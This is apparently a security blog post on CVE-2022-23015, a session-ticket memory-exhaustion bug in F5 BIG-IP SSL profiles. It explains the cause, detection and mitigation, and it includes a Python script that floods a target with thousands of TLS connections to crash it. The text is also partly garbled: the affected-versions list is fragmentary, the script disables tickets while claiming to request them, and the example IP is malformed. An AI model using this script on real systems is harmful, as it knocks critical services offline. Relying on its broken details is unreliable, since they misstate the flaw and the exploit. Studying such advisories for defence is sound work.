F5's BIG-IP appliances are widely used across enterprises for load balancing, application delivery, and advanced security. In 2022, a notable vulnerability surfaced: CVE-2022-23015, affecting BIG-IP systems with specific SSL configurations. This post will explain what the vulnerability is, why it’s a problem, and include technical detail—along with real-world impact, a code/sample exploit, and useful references.
What is CVE-2022-23015?
CVE-2022-23015 describes a flaw in certain BIG-IP software versions when handling SSL traffic with *Client SSL* profiles:
And Session Ticket is enabled and configured.
Over time, this problem can cause BIG-IP appliances to slow down or even crash, which might allow an attacker to perform a denial of service (DoS) attack.
14.1.2.6 up to 14.1.4.4
> ⚠️ If you are running End of Technical Support (EoTS) versions, they are not evaluated but *may* be vulnerable.
Let’s simplify the root cause
- BIG-IP uses OpenSSL/SSL profiles to handle encrypted connections.
- When both client certificates and session tickets are supported, internal memory objects used for managing "sessions" aren’t always released correctly, especially under high SSL connection rates.
- Attackers (or overly aggressive clients) can create many new SSL sessions, causing session objects to pile up in memory.
Basic Attack Scenario
Imagine an automated tool that keeps making SSL connections, asking for new session tickets each time, and never resuming old ones. The BIG-IP keeps allocating memory for these session objects and never recycles them.
Over time, this buildup can look like
1. Client initiates SSL handshake, requests session ticket
2. BIG-IP stores session info in memory
3. Client disconnects, never uses session ticket
4. Repeat steps 1–3 thousands of times (automated)
5. BIG-IP memory fills with expired sessions, eventually fails
Example Attack Script
You can use Python with ssl and socket libraries to simulate what an attacker might do (for educational purposes):
import socket
import ssl
import time
SERVER_IP = '192..2.10' # Target BIG-IP virtual server
PORT = 443
def launch_memory_dos():
for i in range(10000):
try:
sock = socket.create_connection((SERVER_IP, PORT))
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
# Ask for a new session, never re-using tickets
context.options |= ssl.OP_NO_TICKET
ssock = context.wrap_socket(sock, server_hostname="example.com")
# Optionally send something
ssock.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
ssock.close()
print(f"Connection {i+1} done")
except Exception as e:
print("Error:", e)
time.sleep(.01) # Slow down, but not much
if __name__ == "__main__":
launch_memory_dos()
Disclaimer: Do *not* run this on systems you do not own or have permission to test. This code is for understanding and demonstration purposes only.
Real-World Risk
If your production F5 BIG-IP device is publicly accessible and has these SSL configurations, an unauthenticated attacker could crash it or exhaust its memory, knocking critical apps offline. This makes the bug dangerous for organizations operating high-availability environments.
Detection
- Symptoms: Unexpectedly high memory use, frequent out-of-memory alerts, and SSL traffic crashes or slowdowns.
- Logs: The BIG-IP system may log SSL session errors, memory warnings, or new failures loading the Client SSL profile.
References & Further Reading
- F5 Security Advisory (K25105363)
- NIST NVD: CVE-2022-23015
- F5 Public Knowledge Center
Conclusion
CVE-2022-23015 might seem subtle, but it's a classic resource exhaustion bug in a critical layer. Left unpatched, it can turn your company’s load-balancer into an attacker’s plaything. Check your SSL configuration, review your F5 firmware, and always upgrade as soon as possible—or turn off session tickets if you can’t.
If you found this post useful, consider sharing it with your network, especially if you’re running BIG-IP gear!
Timeline
Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 19:00:00 UTC